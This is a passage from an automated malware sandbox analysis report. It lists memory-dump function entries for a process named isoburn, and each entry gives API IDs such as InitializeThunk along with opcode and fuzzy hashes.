                                                          • Source File: 0000000C.00000002.2500548268.0000000002F90000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F90000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_2f90000_isoburn.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Close
                                                          • String ID:
                                                          • API String ID: 3535843008-0
                                                          • Opcode ID: 6a676e2e009e07708bbe963b130a833cbfc46acaa7b4dc646f7534d15dcc5b9e
                                                          • Instruction ID: d8363321ddb4e9f743b040bfbb451f22fdf7e7e3ab16493dc0cce16bea4a1c0b
                                                          • Opcode Fuzzy Hash: 6a676e2e009e07708bbe963b130a833cbfc46acaa7b4dc646f7534d15dcc5b9e
                                                          • Instruction Fuzzy Hash: 9DE08C362002047BE620EB6ADC41FDB77AEDFCA750F00411AFA0CA7242C671BA108BF0
                                                          Function 05254650 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.2505224736.00000000051E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 051E0000, based on PE: true
                                                          • Associated: 0000000C.00000002.2505224736.0000000005309000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2505224736.000000000530D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2505224736.000000000537E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_51e0000_isoburn.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: f912beb0630e3a27243edce0692047aeb992b87c0f8b5840c2d7fb3c921dce6d
                                                          • Instruction ID: 6d60997ae3ae71c25d64f8700993ff8bf8059c98d7ba73a6ce5d5e66fa7023fd
                                                          • Opcode Fuzzy Hash: f912beb0630e3a27243edce0692047aeb992b87c0f8b5840c2d7fb3c921dce6d
                                                          • Instruction Fuzzy Hash: F09002A66115008241407158484440660559BE13013D5C115A5554560C86588D959269
                                                          Function 05254340 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.2505224736.00000000051E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 051E0000, based on PE: true
                                                          • Associated: 0000000C.00000002.2505224736.0000000005309000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2505224736.000000000530D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2505224736.000000000537E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_51e0000_isoburn.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: a7420159639937cb19688b3605afd317da24d149fddad1adbfdd3cb1c9c1fc85
                                                          • Instruction ID: 69ab2c730240cde4d059e01320666e1cecafa67ffbc3cf89f12fd122c985a9da
                                                          • Opcode Fuzzy Hash: a7420159639937cb19688b3605afd317da24d149fddad1adbfdd3cb1c9c1fc85
                                                          • Instruction Fuzzy Hash: 5D900276615800529140715848C454640559BE0301B95C011E5424554C8A548E965361
                                                          Function 05252D30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.2505224736.00000000051E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 051E0000, based on PE: true
                                                          • Associated: 0000000C.00000002.2505224736.0000000005309000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2505224736.000000000530D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2505224736.000000000537E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_51e0000_isoburn.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: 4758fc1fd5fc30e93f990d1d918eeb7c6ba77ac24ac916654818f72d3bd6b384
                                                          • Instruction ID: 0c3c9ea2f0d99611fed86a9d79a686283bc2ff9180331b603a569298f65b2db7
                                                          • Opcode Fuzzy Hash: 4758fc1fd5fc30e93f990d1d918eeb7c6ba77ac24ac916654818f72d3bd6b384
                                                          • Instruction Fuzzy Hash: D590047731140043D140715C545C7074055DFF1301FD5D011F5414554CDD55CDD75333
                                                          Function 05252D10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.2505224736.00000000051E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 051E0000, based on PE: true
                                                          • Associated: 0000000C.00000002.2505224736.0000000005309000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2505224736.000000000530D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2505224736.000000000537E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_51e0000_isoburn.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: d2e61aeb38d44a23fd0702043d9d0dcc2ceb4d1a2c56098b2382e0a33c46b529
                                                          • Instruction ID: d9343c159471dc5c6e628e8ec5298750be2c75b277d62701dfe3d0a8103ccde3
                                                          • Opcode Fuzzy Hash: d2e61aeb38d44a23fd0702043d9d0dcc2ceb4d1a2c56098b2382e0a33c46b529
                                                          • Instruction Fuzzy Hash: A690026E22340042D1807158544860A00558BD1202FD5D415A5015558CC9558DA95321
                                                          Function 05252DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.2505224736.00000000051E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 051E0000, based on PE: true
                                                          • Associated: 0000000C.00000002.2505224736.0000000005309000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2505224736.000000000530D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2505224736.000000000537E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_51e0000_isoburn.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: c49c6b3e35c3fdde98d48e7e069dcb637026b2ca9a088b942a3948f8f4915225
                                                          • Instruction ID: 15f2ddc6e46101a337496706ca382d0d25b2e5d3f950288d890294f300fec565
                                                          • Opcode Fuzzy Hash: c49c6b3e35c3fdde98d48e7e069dcb637026b2ca9a088b942a3948f8f4915225
                                                          • Instruction Fuzzy Hash: 5490027621140453D1117158454470700598BD0241FD5C412A5424558D96968E92A121
                                                          Function 05252DD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.2505224736.00000000051E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 051E0000, based on PE: true
                                                          • Associated: 0000000C.00000002.2505224736.0000000005309000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2505224736.000000000530D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2505224736.000000000537E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_51e0000_isoburn.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: 443f0271758b8178963b070ab5a0b69d2e458ce641066dadcfe352acf4f44d4c
                                                          • Instruction ID: 5dca4b9639394d90780485a1cbd3345c031be6c9c1a7a651ccbf814c4afe0498
                                                          • Opcode Fuzzy Hash: 443f0271758b8178963b070ab5a0b69d2e458ce641066dadcfe352acf4f44d4c
                                                          • Instruction Fuzzy Hash: 30900266252441925545B158444450740569BE02417D5C012A6414950C85669D96D621
                                                          Function 05252C60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.2505224736.00000000051E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 051E0000, based on PE: true
                                                          • Associated: 0000000C.00000002.2505224736.0000000005309000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2505224736.000000000530D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2505224736.000000000537E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_51e0000_isoburn.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: d52d167b93e1c02edd0a73a392a2b5f6c11ef19efd4a10fed639efcd545bb2a9
                                                          • Instruction ID: c0531658233efd6e5f11bcd835bed9383020cec18e83a01bc71b87979c0c09ed
                                                          • Opcode Fuzzy Hash: d52d167b93e1c02edd0a73a392a2b5f6c11ef19efd4a10fed639efcd545bb2a9
                                                          • Instruction Fuzzy Hash: 3990027621140882D10071584444B4600558BE0301F95C016A5124654D8655CD917521
                                                          Function 05252C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.2505224736.00000000051E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 051E0000, based on PE: true
                                                          • Associated: 0000000C.00000002.2505224736.0000000005309000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2505224736.000000000530D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2505224736.000000000537E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_51e0000_isoburn.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: 46f975c095d5ec3d458116c5a3b9b89ec77ef0ab4aeec106e5e63318100164f0
                                                          • Instruction ID: 93d3b8122c62b565b1876361f3be1a655c712a8f7828e6a989de6f62824923e9
                                                          • Opcode Fuzzy Hash: 46f975c095d5ec3d458116c5a3b9b89ec77ef0ab4aeec106e5e63318100164f0
                                                          • Instruction Fuzzy Hash: 7390027621148842D1107158844474A00558BD0301F99C411A9424658D86D58DD17121
                                                          Function 05252CA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.2505224736.00000000051E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 051E0000, based on PE: true
                                                          • Associated: 0000000C.00000002.2505224736.0000000005309000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2505224736.000000000530D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2505224736.000000000537E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_51e0000_isoburn.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: 2dab46974b321ddfbee9060035053b2dd404abf9c33e93f799f35d496c652782
                                                          • Instruction ID: a5aca80c623f811580ef2539dc35379fec7b20c364c00acba2477c639dd29715
                                                          • Opcode Fuzzy Hash: 2dab46974b321ddfbee9060035053b2dd404abf9c33e93f799f35d496c652782
                                                          • Instruction Fuzzy Hash: 5390027621140442D1007598544864600558BE0301F95D011AA024555EC6A58DD16131
                                                          Function 05252F30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.2505224736.00000000051E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 051E0000, based on PE: true
                                                          • Associated: 0000000C.00000002.2505224736.0000000005309000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2505224736.000000000530D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2505224736.000000000537E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_51e0000_isoburn.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: 739eed0b13b8696a5bdc3ce122473da1ced9396096bb490b606c81cc7172ef0f
                                                          • Instruction ID: 80cdffa955c4b3b52468b70b5437913de56164f113f31071c155c18282481faa
                                                          • Opcode Fuzzy Hash: 739eed0b13b8696a5bdc3ce122473da1ced9396096bb490b606c81cc7172ef0f
                                                          • Instruction Fuzzy Hash: D29002A635140482D10071584454B060055CBE1301F95C015E6064554D8659CD926126
                                                          Function 05252FB0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.2505224736.00000000051E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 051E0000, based on PE: true
                                                          • Associated: 0000000C.00000002.2505224736.0000000005309000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2505224736.000000000530D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2505224736.000000000537E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_51e0000_isoburn.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: 29cdd1e34c5fea03bc37298212412d8abae58d7ebb355bb86650580ab6fd1ca5
                                                          • Instruction ID: b8185f1d2dd55a7fc40b4d6933535461a5f6c80885fadd3afb01409c6f57b9e9
                                                          • Opcode Fuzzy Hash: 29cdd1e34c5fea03bc37298212412d8abae58d7ebb355bb86650580ab6fd1ca5
                                                          • Instruction Fuzzy Hash: 99900266611400824140716888849064055AFE1211795C121A5998550D85998DA55665
                                                          Function 05252FE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.2505224736.00000000051E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 051E0000, based on PE: true
                                                          • Associated: 0000000C.00000002.2505224736.0000000005309000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2505224736.000000000530D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2505224736.000000000537E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_51e0000_isoburn.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: ce862b1cd2451ba2eccccc7083e7c595ef5c0ac75287d8413795c9b9704091fc
                                                          • Instruction ID: 3789d9419c38bfb6e381c52446f469914a75b37c8f128cc027f482cd16c01063
                                                          • Opcode Fuzzy Hash: ce862b1cd2451ba2eccccc7083e7c595ef5c0ac75287d8413795c9b9704091fc
                                                          • Instruction Fuzzy Hash: 76900266221C0082D20075684C54B0700558BD0303F95C115A5154554CC9558DA15521
                                                          Function 05252E80 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.2505224736.00000000051E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 051E0000, based on PE: true
                                                          • Associated: 0000000C.00000002.2505224736.0000000005309000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2505224736.000000000530D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2505224736.000000000537E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_51e0000_isoburn.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: 7a55f731965dd3f0ec61513930eaf51b1c415f40169747eeb31229399c7a7af8
                                                          • Instruction ID: ae892e34dbf7ca76cc428b42c12035ed2252074eed549bef2dfc89af445286db
                                                          • Opcode Fuzzy Hash: 7a55f731965dd3f0ec61513930eaf51b1c415f40169747eeb31229399c7a7af8
                                                          • Instruction Fuzzy Hash: CE90026661140542D10171584444616005A8BD0241FD5C022A6024555ECA658ED2A131
                                                          Function 05252EE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.2505224736.00000000051E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 051E0000, based on PE: true
                                                          • Associated: 0000000C.00000002.2505224736.0000000005309000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2505224736.000000000530D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2505224736.000000000537E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_51e0000_isoburn.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: 60bdbd3fd6ff80bc9879568b26310d705eeba678c8d8d201fafd8480c98345a0
                                                          • Instruction ID: b6102217455d92da9f601a3e38b2d826ebb454c56cac5f72d093f3c2a18cff1b
                                                          • Opcode Fuzzy Hash: 60bdbd3fd6ff80bc9879568b26310d705eeba678c8d8d201fafd8480c98345a0
                                                          • Instruction Fuzzy Hash: B29002A621180443D1407558484460700558BD0302F95C011A7064555E8A698D916135
                                                          Function 05252B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.2505224736.00000000051E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 051E0000, based on PE: true
                                                          • Associated: 0000000C.00000002.2505224736.0000000005309000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2505224736.000000000530D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2505224736.000000000537E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_51e0000_isoburn.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: 509e5bb995f41282db62453d15bb216219ebfceff225c5eb3ed6ec8c6259e7e6
                                                          • Instruction ID: b8190ff6f5982f8321ffa1d430e777e4a966c00e2d88f4ac29b2551f55786c54
                                                          • Opcode Fuzzy Hash: 509e5bb995f41282db62453d15bb216219ebfceff225c5eb3ed6ec8c6259e7e6
                                                          • Instruction Fuzzy Hash: AB9002A621240043410571584454616405A8BE0201B95C021E6014590DC5658DD16125
                                                          Function 05252BA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.2505224736.00000000051E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 051E0000, based on PE: true
                                                          • Associated: 0000000C.00000002.2505224736.0000000005309000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2505224736.000000000530D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2505224736.000000000537E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_51e0000_isoburn.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: 69aabacf7d3e8dfab41d6ed54eddcabb1837d5db9492dba235527a440eab1d07
                                                          • Instruction ID: eb86481f9292a23ff5a470efd08bbfb7eef710da0844070dde5dde6a457d9349
                                                          • Opcode Fuzzy Hash: 69aabacf7d3e8dfab41d6ed54eddcabb1837d5db9492dba235527a440eab1d07
                                                          • Instruction Fuzzy Hash: 9590027661540842D1507158445474600558BD0301F95C011A5024654D87958F9576A1
                                                          Function 05252BE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.2505224736.00000000051E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 051E0000, based on PE: true
                                                          • Associated: 0000000C.00000002.2505224736.0000000005309000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2505224736.000000000530D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2505224736.000000000537E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_51e0000_isoburn.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: 1b615f28611843a621ae5bc28ffb40f1e6e15cf1726608c5a4df7667ec2905a9
                                                          • Instruction ID: 6cb3cf695a4a51e77736fcd1e8964d7575bbd93c282d62cee3ecf698418ff514
                                                          • Opcode Fuzzy Hash: 1b615f28611843a621ae5bc28ffb40f1e6e15cf1726608c5a4df7667ec2905a9
                                                          • Instruction Fuzzy Hash: 8B90027621544882D14071584444A4600658BD0305F95C011A5064694D96658E95B661
                                                          Function 05252BF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.2505224736.00000000051E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 051E0000, based on PE: true
                                                          • Associated: 0000000C.00000002.2505224736.0000000005309000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2505224736.000000000530D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2505224736.000000000537E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_51e0000_isoburn.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: 686a82e3c11c076053404c90c0ba8df0e5529120c16346830b6ac76891c3307b
                                                          • Instruction ID: 7761beac4718fa5b947510f8d714348e3dc856931621d8d391d62760bb438825
                                                          • Opcode Fuzzy Hash: 686a82e3c11c076053404c90c0ba8df0e5529120c16346830b6ac76891c3307b
                                                          • Instruction Fuzzy Hash: C290027621140842D1807158444464A00558BD1301FD5C015A5025654DCA558F9977A1
                                                          Function 05252AF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.2505224736.00000000051E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 051E0000, based on PE: true
                                                          • Associated: 0000000C.00000002.2505224736.0000000005309000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2505224736.000000000530D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2505224736.000000000537E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_51e0000_isoburn.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: d3b75ed8916b4768e07caa2ef264d30ff8a1f98c98baac220d5d71e8f3267ead
                                                          • Instruction ID: 3f8ec2aa6ac9ee97dd42eeccb426536ca813f08f5074efceacd272fca21ccd4a
                                                          • Opcode Fuzzy Hash: d3b75ed8916b4768e07caa2ef264d30ff8a1f98c98baac220d5d71e8f3267ead
                                                          • Instruction Fuzzy Hash: 7390026A231400420145B558064450B04959BD63513D5C015F6416590CC6618DA55321
                                                          Function 05252AD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.2505224736.00000000051E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 051E0000, based on PE: true
                                                          • Associated: 0000000C.00000002.2505224736.0000000005309000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2505224736.000000000530D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2505224736.000000000537E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_51e0000_isoburn.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: 10781ee73773a80814c14df9d90ff5a4661f6805a559aebb3a15e5f3cca14095
                                                          • Instruction ID: 96f1a77fdf353f59446bffbece03cc3b87066a972f6685169fcb5770a43be2f8
                                                          • Opcode Fuzzy Hash: 10781ee73773a80814c14df9d90ff5a4661f6805a559aebb3a15e5f3cca14095
                                                          • Instruction Fuzzy Hash: A390026A221400430105B558074450700968BD5351395C021F6015550CD6618DA15121
                                                          Function 052535C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.2505224736.00000000051E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 051E0000, based on PE: true
                                                          • Associated: 0000000C.00000002.2505224736.0000000005309000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2505224736.000000000530D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2505224736.000000000537E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_51e0000_isoburn.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: dc4f04b9c1daf3b5dcf549021acee7536cf3557e7a5bbb7e84a991201d015866
                                                          • Instruction ID: c9bb7ba6812cc1dbc67e8e10a2264bca7363c6ec250220e4461e97f78c5efb40
                                                          • Opcode Fuzzy Hash: dc4f04b9c1daf3b5dcf549021acee7536cf3557e7a5bbb7e84a991201d015866
                                                          • Instruction Fuzzy Hash: B690027661550442D1007158455470610558BD0201FA5C411A5424568D87D58E9165A2
                                                          Function 052539B0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.2505224736.00000000051E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 051E0000, based on PE: true
                                                          • Associated: 0000000C.00000002.2505224736.0000000005309000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2505224736.000000000530D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2505224736.000000000537E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_51e0000_isoburn.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: 6f44580129e73daebf51403468854ff30a76c03414cdec37ac17d243a95d0a62
                                                          • Instruction ID: fe198216648fa793164bf5bbad635af12ffdd6bd023ca5fb28827018e04d6f0e
                                                          • Opcode Fuzzy Hash: 6f44580129e73daebf51403468854ff30a76c03414cdec37ac17d243a95d0a62
                                                          • Instruction Fuzzy Hash: 9190026625545142D150715C44446164055ABE0201F95C021A5814594D85958D956221
                                                          Function 02F99E36 Relevance: 35.1, APIs: 1, Strings: 19, Instructions: 134threadCOMMON
                                                          Download Yara Rule

